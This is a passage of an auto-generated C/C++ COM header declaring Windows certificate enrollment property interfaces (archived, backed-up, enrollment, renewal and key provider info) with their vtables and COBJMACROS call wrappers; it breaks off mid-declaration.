#define ICertPropertyKeyProvInfo_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyKeyProvInfo_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyKeyProvInfo_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyKeyProvInfo_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyKeyProvInfo_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyKeyProvInfo_Initialize(This,pValue)	\
    ( (This)->lpVtbl -> Initialize(This,pValue) ) 

#define ICertPropertyKeyProvInfo_get_PrivateKey(This,ppValue)	\
    ( (This)->lpVtbl -> get_PrivateKey(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyKeyProvInfo_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyArchived_INTERFACE_DEFINED__
#define __ICertPropertyArchived_INTERFACE_DEFINED__

/* interface ICertPropertyArchived */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyArchived;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab337-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyArchived : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ VARIANT_BOOL ArchivedValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Archived( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyArchivedVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyArchived * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyArchived * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyArchived * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyArchived * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyArchived * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyArchived * This,
            /* [in] */ VARIANT_BOOL ArchivedValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Archived )( 
            __RPC__in ICertPropertyArchived * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        END_INTERFACE
    } ICertPropertyArchivedVtbl;

    interface ICertPropertyArchived
    {
        CONST_VTBL struct ICertPropertyArchivedVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyArchived_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyArchived_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyArchived_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyArchived_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyArchived_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyArchived_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyArchived_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyArchived_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyArchived_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyArchived_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyArchived_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyArchived_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyArchived_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyArchived_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyArchived_Initialize(This,ArchivedValue)	\
    ( (This)->lpVtbl -> Initialize(This,ArchivedValue) ) 

#define ICertPropertyArchived_get_Archived(This,pValue)	\
    ( (This)->lpVtbl -> get_Archived(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyArchived_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyBackedUp_INTERFACE_DEFINED__
#define __ICertPropertyBackedUp_INTERFACE_DEFINED__

/* interface ICertPropertyBackedUp */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyBackedUp;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab338-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyBackedUp : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeFromCurrentTime( 
            /* [in] */ VARIANT_BOOL BackedUpValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ VARIANT_BOOL BackedUpValue,
            /* [in] */ DATE Date) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_BackedUpValue( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_BackedUpTime( 
            /* [retval][out] */ __RPC__out DATE *pDate) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyBackedUpVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyBackedUp * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyBackedUp * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyBackedUp * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCurrentTime )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ VARIANT_BOOL BackedUpValue);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [in] */ VARIANT_BOOL BackedUpValue,
            /* [in] */ DATE Date);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_BackedUpValue )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_BackedUpTime )( 
            __RPC__in ICertPropertyBackedUp * This,
            /* [retval][out] */ __RPC__out DATE *pDate);
        
        END_INTERFACE
    } ICertPropertyBackedUpVtbl;

    interface ICertPropertyBackedUp
    {
        CONST_VTBL struct ICertPropertyBackedUpVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyBackedUp_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyBackedUp_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyBackedUp_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyBackedUp_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyBackedUp_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyBackedUp_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyBackedUp_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyBackedUp_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyBackedUp_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyBackedUp_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyBackedUp_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyBackedUp_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyBackedUp_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyBackedUp_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyBackedUp_InitializeFromCurrentTime(This,BackedUpValue)	\
    ( (This)->lpVtbl -> InitializeFromCurrentTime(This,BackedUpValue) ) 

#define ICertPropertyBackedUp_Initialize(This,BackedUpValue,Date)	\
    ( (This)->lpVtbl -> Initialize(This,BackedUpValue,Date) ) 

#define ICertPropertyBackedUp_get_BackedUpValue(This,pValue)	\
    ( (This)->lpVtbl -> get_BackedUpValue(This,pValue) ) 

#define ICertPropertyBackedUp_get_BackedUpTime(This,pDate)	\
    ( (This)->lpVtbl -> get_BackedUpTime(This,pDate) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyBackedUp_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyEnrollment_INTERFACE_DEFINED__
#define __ICertPropertyEnrollment_INTERFACE_DEFINED__

/* interface ICertPropertyEnrollment */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyEnrollment;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab339-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyEnrollment : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ LONG RequestId,
            /* [in] */ __RPC__in BSTR strCADnsName,
            /* [in] */ __RPC__in BSTR strCAName,
            /* [defaultvalue][in] */ __RPC__in BSTR strFriendlyName = 0) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RequestId( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CADnsName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CAName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_FriendlyName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyEnrollmentVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyEnrollment * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyEnrollment * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyEnrollment * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromCertificate )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_PropertyId )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [retval][out] */ __RPC__out CERTENROLL_PROPERTYID *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_PropertyId )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ CERTENROLL_PROPERTYID Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromCertificate )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *SetValueOnCertificate )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [in] */ LONG RequestId,
            /* [in] */ __RPC__in BSTR strCADnsName,
            /* [in] */ __RPC__in BSTR strCAName,
            /* [defaultvalue][in] */ __RPC__in BSTR strFriendlyName);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequestId )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CADnsName )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CAName )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_FriendlyName )( 
            __RPC__in ICertPropertyEnrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } ICertPropertyEnrollmentVtbl;

    interface ICertPropertyEnrollment
    {
        CONST_VTBL struct ICertPropertyEnrollmentVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertPropertyEnrollment_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertPropertyEnrollment_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertPropertyEnrollment_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertPropertyEnrollment_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertPropertyEnrollment_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertPropertyEnrollment_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertPropertyEnrollment_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertPropertyEnrollment_InitializeFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> InitializeFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyEnrollment_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define ICertPropertyEnrollment_get_PropertyId(This,pValue)	\
    ( (This)->lpVtbl -> get_PropertyId(This,pValue) ) 

#define ICertPropertyEnrollment_put_PropertyId(This,Value)	\
    ( (This)->lpVtbl -> put_PropertyId(This,Value) ) 

#define ICertPropertyEnrollment_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define ICertPropertyEnrollment_RemoveFromCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> RemoveFromCertificate(This,MachineContext,Encoding,strCertificate) ) 

#define ICertPropertyEnrollment_SetValueOnCertificate(This,MachineContext,Encoding,strCertificate)	\
    ( (This)->lpVtbl -> SetValueOnCertificate(This,MachineContext,Encoding,strCertificate) ) 


#define ICertPropertyEnrollment_Initialize(This,RequestId,strCADnsName,strCAName,strFriendlyName)	\
    ( (This)->lpVtbl -> Initialize(This,RequestId,strCADnsName,strCAName,strFriendlyName) ) 

#define ICertPropertyEnrollment_get_RequestId(This,pValue)	\
    ( (This)->lpVtbl -> get_RequestId(This,pValue) ) 

#define ICertPropertyEnrollment_get_CADnsName(This,pValue)	\
    ( (This)->lpVtbl -> get_CADnsName(This,pValue) ) 

#define ICertPropertyEnrollment_get_CAName(This,pValue)	\
    ( (This)->lpVtbl -> get_CAName(This,pValue) ) 

#define ICertPropertyEnrollment_get_FriendlyName(This,pValue)	\
    ( (This)->lpVtbl -> get_FriendlyName(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertPropertyEnrollment_INTERFACE_DEFINED__ */


#ifndef __ICertPropertyRenewal_INTERFACE_DEFINED__
#define __ICertPropertyRenewal_INTERFACE_DEFINED__

/* interface ICertPropertyRenewal */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPropertyRenewal;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab33a-217d-11da-b2a4-000e7bbb2b09")
    ICertPropertyRenewal : public ICertProperty
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strRenewalValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromCertificateHash( 
            /* [in] */ VARIANT_BOOL MachineContext,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strCertificate) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Renewal( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPropertyRenewalVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPropertyRenewal * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPropertyRenewal * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPropertyRenewal * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPropertyRenewal * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
